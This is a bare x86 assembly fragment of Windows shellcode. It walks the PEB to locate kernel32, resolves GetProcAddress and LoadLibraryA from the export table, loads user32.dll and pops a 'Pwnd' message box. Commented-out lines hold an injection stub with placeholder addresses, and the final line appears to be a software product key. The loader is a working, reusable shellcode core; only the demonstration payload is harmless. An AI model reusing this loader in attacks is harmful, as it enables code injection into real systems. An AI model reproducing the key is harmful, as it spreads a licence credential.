getkernel32:
			xor ecx, ecx
			mov eax, fs:[ecx + 0x30]
			mov eax, [eax + 0x00c]
			mov esi, [eax + 0x014]
			lodsd
			xchg esi, eax
			lodsd
			mov ebx, [eax + 0x10]
			getAddressofName:
		mov edx, [ebx + 0x3c]
			add edx, ebx
			mov edx, [edx + 0x78]
			add edx, ebx
			mov esi, [edx + 0x20]
			add esi, ebx
			xor ecx, ecx
			getProcAddress:
		inc ecx
			lodsd
			add eax, ebx
			cmp [eax], 0x50746547
			jnz getProcAddress
			cmp [eax + 0x4], 0x41636F72
			jnz getProcAddress
			cmp [eax + 0x8], 0x65726464
			jnz getProcAddress

			getProcAddressFunc:
		mov esi, [edx + 0x24]
			add esi, ebx
			mov cx, [esi + ecx * 2]
			dec ecx
			mov esi, [edx + 0x1c]
			add esi, ebx
			mov edx, [esi + ecx * 4]
			add edx, ebx
			mov ebp, edx

			getLoadLibraryA:
		xor ecx, ecx
			push ecx
			push 0x41797261
			push 0x7262694c
			push 0x64616f4c
			push esp
			push ebx
			call edx
			getUser32 :
		push 0x61616c6c
			sub [esp + 0x2], 0x6161
			push 0x642e3233
			push 0x72657355
			push esp
			call eax
			getMessageBox:
		push 0x6141786f
			sub [esp + 0x3], 0x61
			push 0x42656761
			push 0x7373654d
			push esp
			push eax
			call ebp
			MessageBoxA:
		add esp, 0x010
			xor edx, edx
			xor ecx, ecx
			push edx
			push 'Pwnd'
			mov edi, esp
			push edx
			push 'Yess'
			mov ecx, esp
			push edx
			push edi
			push ecx
			push edx
			call eax           
/*push 0
			lea eax, [ebp + caption]
			push eax
			lea eax, [ebp + text]
			push eax
			push 0
			mov eax, 0xAAAAAAAA
			call eax			*/

/*mov ebx, 0xDDDDDDDD
			mov eax, [esp + 0x28]
			sub eax, ebx*/

BJ84H-M4M4R-2VYC4-HQRBP-G2BGY
